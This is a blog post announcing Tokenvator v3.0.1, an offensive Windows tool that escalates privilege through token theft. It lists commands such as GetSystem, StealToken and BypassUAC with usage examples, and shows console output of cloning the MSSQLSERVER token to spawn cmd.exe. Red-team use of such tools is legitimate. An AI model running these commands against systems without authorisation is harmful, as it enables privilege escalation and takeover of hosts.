Tokenvator v3.0.1 releases: A tool to elevate privilege with Windows Tokens

by do son · Published March 22, 2019 · Updated August 24, 2021

Tokenvator

A tool to elevate privilege with Windows Tokens

This tool has two methods of operation – interactive and argument modes

Interactive Mode:
C:> tokenvator.exe
(Tokens) > steal_token 908 cmd.exe
(Tokens) >

Arguments Mode:
C:> tokenvator.exe steal_token 908 cmd.exe
C:>

Methods

GetSystem
- Optional Parameters: Process ID, Command
- Examples:
  (Tokens) > GetSystem
  or
  (Tokens) > GetSystem 504
  or
  (Tokens) > GetSystem 504 regedit.exe
GetTrustedInstaller
- Optional Parameters: Command
- Examples:
  (Tokens) > GetTrustedInstaller
  or
  (Tokens) > GetTrustedInstaller regedit.exe
Steal_Token
- Parameters: Process ID
- Optional Parameters: Command
- Examples:
  (Tokens) > StealToken 1008
  or
  (Tokens) > StealToken calc regedit.exe
  or
  (Tokens) > StealToken 1008 regedit.exe
BypassUAC
- Parameters: Process ID
- Optional Parameters: Command
- Examples:
  (Tokens) > BypassUAC 1008
  or
  (Tokens) > BypassUAC regedit.exe
  or
  (Tokens) > BypassUAC 1008 regedit.exe
List_Privileges
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > List_Privileges
Set_Privileges
- Parameters: Privilege
- Optional Parameters: –
- Examples:
  (Tokens) > Set_Privileges SeSecurityPrivilege
List_Processes
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > List_Processes
List_Processes_WMI
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > List_Processes_WMI
Find_User_Processes
- Parameters: Username
- Optional Parameters: –
- Examples:
  (Tokens) > Find_User_Processes domain\user
Find_User_Processes_WMI
- Parameters: Username
- Optional Parameters: –
- Examples:
  (Tokens) > Find_User_Processes_WMI domain\user
List_User_Sessions
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > List_User_Sessions
WhoAmI
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > WhoAmI
RevertToSelf
- Parameters: –
- Optional Parameters: –
- Examples:
  (Tokens) > RevertToSelf
Run
- Parameters: Command
- Optional Parameters: –
- Examples:
  (Tokens) > Run cmd.exe

Changelog v3.0.1

Added Clone_Token

C:\>Tokenvator.exe Clone_Token /Process:3824 /Command:cmd.exe
(Tokens) >
Option               Value
------               -----
process              3824
command              cmd.exe

[+] 3824 sqlservr
[*] Command: cmd.exe
[*] Arguments:
[*] If the above doesn't look correct you may need quotes

[+] SeCreateTokenPrivilege is present and enabled on the token

[-] SeSecurityPrivilege is not enabled on the token
[*] Enabling SeSecurityPrivilege on the token
[*] Adjusting Token Privilege SeSecurityPrivilege => SE_PRIVILEGE_ENABLED
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeSecurityPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED

_SECURITY_QUALITY_OF_SERVICE
_OBJECT_ATTRIBUTES
[*] Recieved Process Handle 0x02E4
[*] Recieved Token Handle 0x02E8
[+] Source: Advapi
[+] User:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Enumerated 12 Groups:
S-1-16-12288                                       Some or all identity references could not be translated.
S-1-1-0                                            Everyone
S-1-5-21-258464558-1780981397-2849438727-1005      DESKTOP-J5KC1AR\PdwComputeNodeAccess
S-1-5-32-558                                       BUILTIN\Performance Monitor Users
S-1-5-32-545                                       BUILTIN\Users
S-1-5-6                                            NT AUTHORITY\SERVICE
S-1-2-1                                            CONSOLE LOGON
S-1-5-11                                           NT AUTHORITY\Authenticated Users
S-1-5-15                                           NT AUTHORITY\This Organization
S-1-5-5-0-217494                                   Some or all identity references could not be translated.
S-1-2-0                                            LOCAL
S-1-5-80-0                                         NT SERVICE\ALL SERVICES
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 9 Privileges

Privilege Name                               Enabled
--------------                               -------
SeAssignPrimaryTokenPrivilege                False
SeIncreaseQuotaPrivilege                     False
SeShutdownPrivilege                          False
SeChangeNotifyPrivilege                      True
SeUndockPrivilege                            False
SeImpersonatePrivilege                       True
SeCreateGlobalPrivilege                      True
SeIncreaseWorkingSetPrivilege                False
SeTimeZonePrivilege                          False

[+] Owner:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Primary Group:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] ACL Count: 659
[*] Updating Desktop DACL
[+] hDesktop : 0x02F0
 [+] Recieved DACL : 0x293CC0284C4
 [+] Create Everyone Sid - Pass 1 : 0x000C
 [+] Create Everyone Sid - Pass 2 : 0x293CC03F530
 [+] Added Everyone to DACL : 0x293CC03A0B0
 [+] Applied DACL to Object
[+] hWinSta0 : 0x0318
 [+] Recieved DACL : 0x293CC04B8B4
 [+] Create Everyone Sid - Pass 1 : 0x000C
 [+] Create Everyone Sid - Pass 2 : 0x293CC03F610
 [+] Added Everyone to DACL : 0x293CC053400
 [+] Applied DACL to Object
[*] CreateProcessWithTokenW
 [+] Created process: 7140
 [+] Created thread:  11228

Download

Copyright (C) Alexander Leary (@0xbadjuju), NetSPI – 2018

Source: https://github.com/0xbadjuju/

Tokenvator v3.0.1 releases: A tool to elevate privilege with Windows Tokens

Tokenvator

Methods

GetSystem

GetTrustedInstaller

Steal_Token

BypassUAC

List_Privileges

Set_Privileges

List_Processes

List_Processes_WMI

Find_User_Processes

Find_User_Processes_WMI

List_User_Sessions

WhoAmI

RevertToSelf

Run

Search